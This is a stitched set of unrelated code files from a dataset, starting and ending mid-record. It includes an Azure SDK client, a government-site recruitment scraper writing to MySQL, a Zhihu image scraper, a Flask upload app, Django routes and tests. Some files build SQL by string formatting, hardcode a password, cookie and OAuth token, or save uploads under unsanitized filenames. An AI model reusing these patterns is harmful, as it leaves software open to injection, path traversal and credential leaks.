self.qx.shape, 
None, self.qx_b, self.qy_b, self.res_b, real(bi_thick.value[i]),\n real(pars['scale']), real(sub), np.uint32(self.qx.size))\n cl.enqueue_copy(self.queue, self.res, self.res_b)\n\n sum += bi_thick.weight[i]*self.res\n norm += bi_thick.weight[i]\n\n return sum/norm + pars['background']\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Models/code_lamellar.py","file_name":"code_lamellar.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"308268206","text":"#---------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n#---------------------------------------------------------------------------------------------\n#pylint: skip-file\n\n# coding=utf-8\n# --------------------------------------------------------------------------\n# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.pipeline import ClientRawResponse\nfrom msrestazure.azure_exceptions import CloudError\nfrom msrestazure.azure_operation import AzureOperationPoller\nimport uuid\n\nfrom .. import models\n\n\nclass TrafficManagerProfileOperations(object):\n \"\"\"TrafficManagerProfileOperations operations.\n\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An objec model deserializer.\n \"\"\"\n\n def __init__(self, client, config, serializer, deserializer):\n\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n\n self.config = config\n\n def create_or_update(\n self, resource_group_name, deployment_name, routing_method, traffic_manager_profile_name, unique_dns_name, content_version=None, location=\"global\", monitor_path=\"/\", monitor_port=80, monitor_protocol=\"http\", status=\"enabled\", ttl=30, custom_headers=None, raw=False, **operation_config):\n \"\"\"\n Create or update a virtual machine.\n\n :param resource_group_name: The name of the resource group. The name\n is case insensitive.\n :type resource_group_name: str\n :param deployment_name: The name of the deployment.\n :type deployment_name: str\n :param routing_method: Routing method. Possible values include:\n 'priority', 'performance', 'weighted'\n :type routing_method: str or :class:`routingMethod\n <trafficmanagerprofilecreationclient.models.routingMethod>`\n :param traffic_manager_profile_name: Name of resource.\n :type traffic_manager_profile_name: str\n :param unique_dns_name: Relative DNS name for the traffic manager\n profile, resulting FQDN will be <uniqueDnsName>.trafficmanager.net,\n must be globally unique.\n :type unique_dns_name: str\n :param content_version: If included it must match the ContentVersion\n in the template.\n :type content_version: str\n :param location: Location for traffic manager or 'global'.\n :type location: str\n :param monitor_path: Path to monitor.\n :type monitor_path: str\n :param monitor_port: Port to monitor.\n :type monitor_port: int\n :param monitor_protocol: Monitor protocol. 
Possible values include:\n 'http', 'https'\n :type monitor_protocol: str or :class:`monitorProtocol\n <trafficmanagerprofilecreationclient.models.monitorProtocol>`\n :param status: Create an enabled or disabled profile. Possible values\n include: 'enabled', 'disabled'\n :type status: str or :class:`status\n <trafficmanagerprofilecreationclient.models.status>`\n :param ttl: DNS Config time-to-live in seconds.\n :type ttl: int\n :param dict custom_headers: headers that will be added to the request\n :param bool raw: returns the direct response alongside the\n deserialized response\n :rtype:\n :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`\n instance that returns :class:`DeploymentExtended\n <default.models.DeploymentExtended>`\n :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`\n if raw=true\n \"\"\"\n parameters = models.DeploymentTrafficManagerProfile(content_version=content_version, location=location, monitor_path=monitor_path, monitor_port=monitor_port, monitor_protocol=monitor_protocol, routing_method=routing_method, status=status, traffic_manager_profile_name=traffic_manager_profile_name, ttl=ttl, unique_dns_name=unique_dns_name)\n\n # Construct URL\n url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\\w\\._]+$'),\n 'deploymentName': self._serialize.url(\"deployment_name\", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\\w\\._]+$'),\n 'subscriptionId': self._serialize.url(\"self.config.subscription_id\", self.config.subscription_id, 'str')\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {}\n query_parameters['api-version'] = self._serialize.query(\"self.config.api_version\", self.config.api_version, 'str')\n\n # Construct headers\n header_parameters = {}\n header_parameters['Content-Type'] = 'application/json; charset=utf-8'\n if self.config.generate_client_request_id:\n header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())\n if custom_headers:\n header_parameters.update(custom_headers)\n if self.config.accept_language is not None:\n header_parameters['accept-language'] = self._serialize.header(\"self.config.accept_language\", self.config.accept_language, 'str')\n\n # Construct body\n body_content = self._serialize.body(parameters, 'DeploymentTrafficManagerProfile')\n\n # Construct and send request\n def long_running_send():\n\n request = self._client.put(url, query_parameters)\n return self._client.send(\n request, header_parameters, body_content, **operation_config)\n\n def get_long_running_status(status_link, headers=None):\n\n request = self._client.get(status_link)\n if headers:\n request.headers.update(headers)\n return self._client.send(\n request, header_parameters, **operation_config)\n\n def get_long_running_output(response):\n\n if response.status_code not in [200, 201]:\n exp = CloudError(response)\n exp.request_id = response.headers.get('x-ms-request-id')\n raise exp\n\n deserialized = None\n\n if response.status_code == 200:\n deserialized = self._deserialize('DeploymentExtended', response)\n if response.status_code == 201:\n deserialized = self._deserialize('DeploymentExtended', response)\n\n if raw:\n client_raw_response = ClientRawResponse(deserialized, response)\n return 
client_raw_response\n\n return deserialized\n\n if raw:\n response = long_running_send()\n return get_long_running_output(response)\n\n long_running_operation_timeout = operation_config.get(\n 'long_running_operation_timeout',\n self.config.long_running_operation_timeout)\n return AzureOperationPoller(\n long_running_send, get_long_running_output,\n get_long_running_status, long_running_operation_timeout)\n","sub_path":"src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_traffic_manager_profile/lib/operations/traffic_manager_profile_operations.py","file_name":"traffic_manager_profile_operations.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360187338","text":"# -*- coding:utf-8 -*-\nimport optparse\nimport urllib\n\nfrom fake_useragent import UserAgent\n# from newspaper import Article\nfrom urllib import parse\n# -*- coding:utf-8 -*-\nfrom fake_useragent import UserAgent\nimport bs4\nfrom newspaper import Article\nimport requests #爬取网页的库\nfrom bs4 import BeautifulSoup #用于解析网页的库\nimport time\nimport random\nimport nltk\nimport xlrd\nimport requests #爬取网页的库\nimport re\nfrom urllib import parse\nfrom bs4 import BeautifulSoup #用于解析网页的库\nimport time\nimport pymysql\nfrom scrapy import signals\nfrom twisted.enterprise import adbapi\nfrom pymysql import cursors\nimport random\nfrom FindChildLinks import AnalysisLinks\nfrom FindChildLinks import getSecondLink\nfrom FindChildLinks import getThreeLink\n\nfrom ParentLevel import JudgeCurrentLevel\nfrom ExtractText import getTextFromLink\n# 判断二级链接是否具有域名,没有的话需要拼接,返回二级的http链接\ndef Analysis(url):\n linkTest = parse.urlparse(url)\n\n print('1.result.scheme : 网络协议')\n print(linkTest.scheme)\n\n print('2.result.netloc: 服务器位置(也有可能是用户信息)')\n print(linkTest.netloc)\n\n print('3.result.path: 网页文件在服务器中的位置')\n print(linkTest.path)\n\n print('4.result.params: 可选参数')\n print(linkTest.params)\n\n print('5.result.query: &连接键值对')\n print(linkTest.query)\n\n print('result.fragment:')\n print(linkTest.fragment)\n\n\n\n# 判断二级链接是否具有域名,没有的话需要拼接,返回二级的http链接\ndef GetLinkHasNetloc(firstlink,childlink):\n linkTest = parse.urlparse(childlink)\n # 如果域名不为空,说明是全部路径\n if (linkTest.netloc != \"\"):\n return childlink\n # 非全路径\n else:\n my_url = parse.urlparse(firstlink)\n if (childlink[:1] == '.'):\n rightLink = my_url.netloc + my_url.path + childlink[1:]\n if('//' in rightLink):\n rightLink = rightLink.replace('//', '/')\n resultLink = my_url.scheme + '://' + rightLink\n if('index.html' in resultLink):\n resultLink = resultLink.replace('/index.html','')\n return resultLink\n else:\n rightLink = my_url.netloc + my_url.path + childlink[1:]\n if ('//' in rightLink):\n rightLink = rightLink.replace('//', '/')\n resultLink = my_url.scheme + '://' + rightLink\n if(my_url.netloc in resultLink):\n return resultLink\n\n\n\n\n# 使用类创建结构体\nclass urlNode(object):\n class Struct(object):\n def __init__(self, url,title,status,preurl):\n self.url = url\n self.title = title\n self.status = status\n self.preurl = preurl\n\n def make_struct(self, url,title,status,preurl):\n return self.Struct(url,title,status,preurl)\n\nurlNode = urlNode()\n\n# 包含需要正文的链接集合\nfirstresult = set()\n\n# 包含可能出现有效子链接的集合\nsecondresult = set()\n\n# 更多内容\nmoreresult = set()\n\n# 判断链接是否有效的list\ninvalidLink = ['logout','login','void','javascript','void(0)','#','(0)']\n\n\n# 判断是否可能包含有效子链接的判断条件\npossibleUse = ['公示公告', '公告栏', '通知公告', '考录', '招聘','招考','招录']\n\n\ndef analysisurl(testurl):\n # 构造请求头\n urllist 
= [\n r\"https://gitbook.cn/gitchat/columns?page=1&searchKey=&tag=\",\n r\"https://gitbook.cn/gitchat/columns?page=2&searchKey=&tag=\",\n r\"https://gitbook.cn/gitchat/columns?page=3&searchKey=&tag=\",\n r\"https://gitbook.cn/gitchat/columns?page=4&searchKey=&tag=\",\n ]\n\n agent1 = \"Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36\"\n agent2 = \"Mozilla/5.0 (Linux; Android 8.1; EML-AL00 Build/HUAWEIEML-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.143 Crosswalk/24.53.595.0 XWEB/358 MMWEBSDK/23 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/4G Language/zh_CN\"\n agent3 = \"Mozilla/5.0 (Linux; U; Android 8.0.0; zh-CN; MHA-AL00 Build/HUAWEIMHA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.1.4.994 Mobile Safari/537.36\"\n agent4 = \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\"\n agent5 = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\"\n list1 = [agent1, agent2, agent3, agent4, agent5]\n\n agent = random.choice(list1)\n try:\n # 构造请求头信息\n headers = {\n \"User-Agent\": agent,\n \"Cookie\": \"__guid=54589117.3355346342630053000.1545469390794.6116; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1545469392; _ga=GA1.2.525028080.1545469392; customerId=5c1dfddd1c648b470dce01bc; customerToken=7094f880-05c8-11e9-b37a-bbc022d7aefd; customerMail=; isLogin=yes; __utmz=54589117.1550903385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54589117.525028080.1545469392.1550986423.1551265116.3; _gid=GA1.2.1073060500.1552831283; aliyungf_tc=AQAAAD/RilUP4wcAn/Q5cZh/y5cvhjrW; connect.sid=s:dBSjH13Adl1RlFsC2zZlAxGDmFh2kF_F.Yf52AS5i06bgo8lsniQWt1F4NtgmI3rOrmjBIiLwR6Q; SERVER_ID=5aa5eb5e-f0eda04d; Hm_lvt_5667c6d502e51ebd8bd9e9be6790fb5d=1551698067,1551698230,1552831282,1552908428; monitor_count=29; Hm_lpvt_5667c6d502e51ebd8bd9e9be6790fb5d=1552909773\"\n }\n response = requests.get(testurl, headers=headers) # 获取网页数据\n response.encoding = response.apparent_encoding # 当获取的网页有乱码时加\n soup = BeautifulSoup(response.text, 'html.parser')\n bf = soup.find('div', class_='view TRS_UEDITOR trs_paper_default trs_web')\n return soup\n except:\n print(\"服务器拒绝连接........\")\n print(\"让我休息5秒钟啊!!!\")\n print(\"ZZzzzz...\")\n time.sleep(5)\n print(\"做了个美美的梦,睡的很好, 那我们继续吧...\")\n\n# 判断具备有效招聘信息的1级链接,含有公告专栏的1��链接\ndef getresult(testurl):\n soup = analysisurl(testurl)\n for x in soup.find_all('a',href = True):\n if(x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(testurl, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if(isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if('招聘' in title):\n node1 = urlNode.make_struct(url,title,1,testurl)\n firstresult.add(node1)\n isincludeUse = any(word if word in title else False for word in possibleUse)\n if (isincludeUse):\n print('我有可能具备有效的子链接哦: ' + title + ' ' + url)\n node2 = urlNode.make_struct(url,title,1,testurl)\n secondresult.add(node2)\n\n# 可能具备有效招聘信息的1级链接\ndef getresultFromSecondresult(setArray):\n for key in setArray:\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = 
str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 2, key.url)\n firstresult.add(node3)\n if('更多' in title):\n node4 = urlNode.make_struct(url, title, 2, key.url)\n moreresult.add(node4)\n\n# 一级链接中,可能含有二级链接的链接跳转更多\ndef getresultFromMoreresult(setArray):\n for key in setArray:\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 3, key.url)\n firstresult.add(node3)\n\n# 当前的所有链接中,可能还有有效的文本,也就是4级别,这个仅判断firstresult即可\ndef getresultFromMoreresult(setArray):\n for key in setArray:\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n # print('×无效链接:' + url)\n pass\n else:\n # print('✓正常标题:' + url + ' 标题:' + title)\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 3, key.url)\n firstresult.add(node3)\n\n\n\ndef getresultFromFirstresult(setArray):\n for key in setArray.copy():\n soup = analysisurl(key.url)\n for x in soup.find_all('a', href=True):\n if (x.string is not None):\n title = str(x.string).replace('\\n', '').replace('\\t', '').replace(' ', '')\n url = GetLinkHasNetloc(key.url, x['href'])\n isNotValidLink = any(word if word in x['href'] else False for word in invalidLink)\n if (isNotValidLink):\n pass\n else:\n if ('招聘' in title):\n node3 = urlNode.make_struct(url, title, 4, key.url)\n firstresult.add(node3)\n # 如果这个下面还有招聘,则说明现在的链接可以删除了\n\n\ndb = pymysql.connect(host='localhost',\n port=3306,\n user='root',\n password='12345678',\n db='shanxiyuan',\n charset='utf8'\n ) # 连接数据库\n\ncursor = db.cursor()\ncursor.execute(\"DROP TABLE IF EXISTS ExaminationSituation\")\n\nsql = \"\"\"CREATE TABLE ExaminationSituation (\n ID INT PRIMARY KEY AUTO_INCREMENT,\n PARENTID INT(11),\n LINK VARCHAR(255),\n TITLE VARCHAR(255),\n TEXT TEXT\n )\"\"\"\n\ntry:\n cursor = db.cursor()\n cursor.execute(sql)\nexcept:\n db.ping()\n cursor = db.cursor()\n cursor.execute(sql)\n\ndef main():\n print('this message is from main function')\n testurl = 'http://www.shaanxi.gov.cn/'\n print(testurl)\n getresult(testurl)\n print('=' * 40)\n getresultFromSecondresult(secondresult)\n print('=' * 40)\n getresultFromMoreresult(moreresult)\n print('=' * 40)\n print(\"结果\")\n count = 1\n getresultFromFirstresult(firstresult)\n for key in firstresult:\n # print(\"标题%d:\" %count +\" 级别:%d\"% key.status + \" \" + key.title + \" 链接 :\" + key.url + \" 父链接 :\" + key.preurl)\n count = count + 1\n a = Article(key.url, language='zh')\n a.download()\n a.parse()\n db.ping(reconnect=True)\n status = 2;\n sqlw = \"\"\"INSERT INTO ExaminationSituation (PARENTID,LINK, TITLE, TEXT) VALUES (%d,%s,%s,%s)\"\"\"\n data = 
(key.status, \"'%s'\" % key.url, \"'%s'\" % key.title, \"'%s'\" % a.text)\n\n try:\n cursor.execute(sqlw % data)\n db.commit()\n print('插入数据成功')\n except:\n db.rollback()\n print(\"插入数据失败\")\n db.close()\n\n print('=' * 40)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"思路2-根据级别数目/多个数据源.py","file_name":"多个数据源.py","file_ext":"py","file_size_in_byte":13118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119256627","text":"from django.urls import path\nfrom subreddit.views import add_subreddit, subredditview, subreddithot, subredditnew, subscribe, unsubscribe\n\n\nurlpatterns = [\n path('addsubreddit/', add_subreddit, name='addsubreddit'),\n path('r/<str:name>/', subredditview, name='subreddit'),\n path('r/<str:name>/new/', subredditnew, name='subredditnew'),\n path('r/<str:name>/hot/', subreddithot, name='subreddithot'),\n path('subscribed/<int:id>/', subscribe, name='subscribe'),\n path('unsubscribed/<int:id>/', unsubscribe, name='unsubscribe')\n]\n","sub_path":"subreddit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154106903","text":"from django.conf.urls.defaults import *\nfrom tastypie.api import Api\nfrom main.api import EntryResource, UserResource\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nv1_api = Api(api_name='v1')\nv1_api.register(UserResource())\nv1_api.register(EntryResource())\n\n\nurlpatterns = patterns('',\n url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'app/login.html'}),\n url(r'^logout/$', 'main.views.logout_view'),\n (r'^admin/', include(admin.site.urls)),\n (r'^api/', include(v1_api.urls)),\n)","sub_path":"restAPI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47936401","text":"# Author Balbir Singh <balbir@aol.in>\n# Date 12th September 2015\n\nimport os\nfrom flask import Flask, request, redirect, url_for\n\nUPLOAD_FOLDER = '/Users/basingh/Desktop/'\nALLOWED_EXTENSIONS = set(['txt','zip','pdf'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n file_upload = request.files['file']\n if file_upload and allowed_file(file_upload.filename):\n filename = file_upload.filename\n file_upload.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('index'))\n return \"\"\"\n <!doctype html>\n <title>Upload new File\n
</title>\n    <h1>Upload new File</h1>\n    <form action=\"\" method=post enctype=multipart/form-data>\n    <p><input type=file name=file>\n    <input type=submit value=Upload>\n    </form>\n    <p>%s</p>\n    \"\"\" % \"<br>
\".join(os.listdir(app.config['UPLOAD_FOLDER'],))\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5001, debug=True)","sub_path":"python/Flask/Misc/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286127863","text":"import requests,json,urllib\nfrom bs4 import BeautifulSoup\nimport os\n\n#爬取知乎\n\ndef dealHTML(questionID,array):\n #处理网页返回的2条数据\n header={\n 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding':'gzip, deflate, br',\n }\n response = requests.get('https://www.zhihu.com/question/%s'%questionID,headers=header)\n\n soup = BeautifulSoup(response.text, \"lxml\")\n\n list = soup.find_all(attrs={\"class\": \"List-item\"})\n\n for item in list:\n content = item.find_all(attrs={'class':'RichText CopyrightRichText-richText'})\n noscripts = content[0].find_all('noscript')\n for noscript in noscripts:\n noscriptContent = noscript.contents[0]\n dict = noscriptContent.attrs\n if 'data-original' in dict:\n array.append(dict['data-original'])\n elif 'src' in dict:\n array.append(dict['src'])\n\ndef dealJsonAnswers(questionID,array):\n #请求剩下的回答列表\n session = requests.session()\n header = {\n 'Connection': 'Keep-Alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'Accept-Encoding': 'gzip, deflate',\n 'accept': 'application/json, text/plain, */*',\n 'Host': 'www.zhihu.com',\n 'DNT': '1',\n 'X-UDID': 'AGAAo4ucJgqPTt2zZ-tXDbRGYiu2WbVI6vU=',\n 'authorization': 'oauth c3cef7c66a1843f8b3a9e6a1e3160e20',\n }\n\n xrsfResponse = session.post('http://www.zhihu.com/', headers=header)\n\n if xrsfResponse.status_code == 200:\n postDict = {\n 'offset': '2',\n 'limit': '100',\n 'sort_by': 'default',\n 'include': 'data[*].is_normal,admin_closed_comment,reward_info,is_collapsed,annotation_action,annotation_detail,collapse_reason,is_sticky,collapsed_by,suggest_edit,comment_count,can_comment,content,editable_content,voteup_count,reshipment_settings,comment_permission,created_time,updated_time,review_info,question,excerpt,relationship.is_authorized,is_author,voting,is_thanked,is_nothelp,upvoted_followees;data[*].mark_infos[*].url;data[*].author.follower_count,badge[?(type=best_answerer)].topics',\n }\n\n answerRequest = session.get('https://www.zhihu.com/api/v4/questions/%s/answers'%questionID, headers=header,params=postDict)\n\n if answerRequest.status_code == 200:\n content = json.loads(answerRequest.text)\n data = content['data']\n\n for answer in data:\n answerContent = answer['content']\n\n strings = answerContent.split('\\\"')\n for str in set(strings):\n if str.find('http') != -1 and str.find('_r') != -1:\n array.append(str)\n\n\nif __name__ == '__main__':\n questionIDs = ['31284878','58604214','31079801','23622114','27364360','30338288']\n\n urlArray = []\n for questionID in questionIDs:\n dealHTML(questionID,urlArray)\n dealJsonAnswers(questionID,urlArray)\n\n #判断文件夹是否存在\n path = os.getcwd() + '/img'\n if not os.path.exists(path):\n os.makedirs(path)\n\n imageCount = 0\n for url in urlArray:\n print('下载'+str(imageCount)+'====='+url)\n urllib.request.urlretrieve(url, os.getcwd()+'/img/%s.jpg' % imageCount)\n 
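Note on the Flask upload record above: `allowed_file` checks only the extension, and the handler saves `file_upload.filename` verbatim, so a client-supplied name such as `../../tmp/x.txt` can escape UPLOAD_FOLDER through os.path.join. Werkzeug ships a sanitizer for exactly this; a sketch of the safer pattern (an addition, not in the original record):

    from werkzeug.utils import secure_filename

    filename = secure_filename(file_upload.filename)  # drops path separators and dot segments
    file_upload.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))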
imageCount+=1","sub_path":"First.py","file_name":"First.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514148413","text":"import time\nimport torch\nfrom .train_step import train_one_epoch\nfrom .eval_step import evaluate\nimport Utils.detr_misc as utils\nimport os\nimport json\nimport datetime\n\n\ndef training_loop(args, train_config, actor, data_loader_train, data_loader_val):\n output_dir: str = args.output_dir\n\n print(\"Start training\")\n start_time = time.time()\n device = torch.device(args.device)\n for epoch in range(args.start_epoch, train_config['train']['epochs']):\n train_stats = train_one_epoch(actor, data_loader_train, device, epoch,\n train_config['train']['clip_max_norm'])\n actor.new_epoch()\n if output_dir:\n checkpoint_paths = [os.path.join(output_dir, 'checkpoint.pth')]\n # extra checkpoint before LR drop and every 100 epochs\n if (epoch + 1) % train_config['train']['lr_drop'] == 0 or (epoch + 1) % 100 == 0:\n checkpoint_paths.append(os.path.join(output_dir, f'checkpoint{epoch:04}.pth'))\n for checkpoint_path in checkpoint_paths:\n utils.save_on_master(actor.state_dict(), checkpoint_path)\n\n test_stats = evaluate(actor, data_loader_val, device)\n\n log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},\n **{f'test_{k}': v for k, v in test_stats.items()},\n 'epoch': epoch,\n 'n_parameters': actor.n_parameters()}\n\n if args.output_dir and utils.is_main_process():\n with open(os.path.join(output_dir, \"log.txt\"), \"a\") as f:\n f.write(json.dumps(log_stats) + \"\\n\")\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n","sub_path":"training/old/deform_detr_tracking/multires_siamfc_frontend/training_loop.py","file_name":"training_loop.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191749693","text":"# sweetscomplete.entity.custmoer.Customer test\n\n# tell python where to find module source code\nimport os,sys\ninclude_path = os.path.realpath('./src')\nif not os.path.exists(include_path) :\n include_path = os.path.realpath('../src')\n if not os.path.exists(include_path) :\n include_path = os.path.realpath('../../src')\n if not os.path.exists(include_path) :\n include_path = os.path.realpath('../../../src')\nsys.path.append(include_path)\nimport json\nimport unittest\nfrom sweetscomplete.entity.customer import Customer\n\nclass TestCustomer(unittest.TestCase) :\n\n customerFromDict = None\n customerDefaults = None\n customerFromJson = None\n\n testDict = dict({\n 'customerKey' : '00000000',\n 'firstName' : 'Fred',\n 'lastName' : 'Flintstone',\n 'phoneNumber' : '+1-222-333-4444',\n 'email' : 'fred@slate.com',\n 'socialMedia' : {'FB':'https://facebook.com/fred.flintstone','LI':'https://linkedin.com/fflintstone'},\n 'streetAddressOfBuilding' : '123 Rocky Way',\n 'buildingName' : 'House',\n 'city' : 'Bedrock',\n 'stateProvince' : 'ZZ',\n 'locality' : 'Pre Historic',\n 'country' : 'ZZ',\n 'postalCode' : '00000',\n 'latitude' : 11.1111,\n 'longitude' : -11.1111,\n 'userName' : 'freddy',\n 'password' : '12345',\n 'secondaryPhoneNumbers' : ['+1-333-444-5555'],\n 'secondaryEmailAddresses' : ['freddy@flintstone.com','ace@bowling.com'],\n 'dateOfBirth' : '0000-00-00',\n 'gender' : 'M'\n })\n\n testJson = '''{\n \"customerKey\" : \"00000000\",\n \"firstName\" 
: \"Fred\",\n \"lastName\" : \"Flintstone\",\n \"phoneNumber\" : \"+1-222-333-4444\",\n \"email\" : \"fred@slate.com\",\n \"socialMedia\" : {\"FB\":\"https://facebook.com/fred.flintstone\",\"LI\":\"https://linkedin.com/fflintstone\"},\n \"streetAddressOfBuilding\" : \"123 Rocky Way\",\n \"buildingName\" : \"House\",\n \"city\" : \"Bedrock\",\n \"stateProvince\" : \"ZZ\",\n \"locality\" : \"Pre Historic\",\n \"country\" : \"ZZ\",\n \"postalCode\" : \"00000\",\n \"latitude\" : 11.1111,\n \"longitude\" : -11.1111,\n \"userName\" : \"freddy\",\n \"password\" : \"12345\",\n \"secondaryPhoneNumbers\" : [\"+1-333-444-5555\"],\n \"secondaryEmailAddresses\" : [\"freddy@flintstone.com\",\"ace@bowling.com\"],\n \"dateOfBirth\" : \"0000-00-00\",\n \"gender\" : \"M\"\n }'''\n\n def setUp(self) :\n self.customerFromDict = Customer(self.testDict)\n self.customerDefaults = Customer(True)\n self.customerFromJson = Customer(self.testJson)\n\n def test_customer_from_dict(self) :\n expected = '00000000'\n actual = self.customerFromDict.getKey()\n self.assertEqual(expected, actual)\n\n def test_customer_from_dict_get_and_set(self) :\n self.customerFromDict.set('skuNumber', '99999999')\n expected = '99999999'\n actual = self.customerFromDict.get('skuNumber')\n self.assertEqual(expected, actual)\n\n def test_customer_from_json(self) :\n expected = '00000000'\n actual = self.customerFromJson.getKey()\n self.assertEqual(expected, actual)\n\n def test_customer_from_blank(self) :\n expected = ''\n actual = self.customerDefaults.getKey()\n self.assertEqual(expected, actual)\n\ndef main() :\n unittest.main()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"chapters/04/test/sweetscomplete/entity/test_customer.py","file_name":"test_customer.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137453307","text":"import torch\nfrom . import model\nfrom .metric import MultiImageMetric, Union, List\nfrom . 
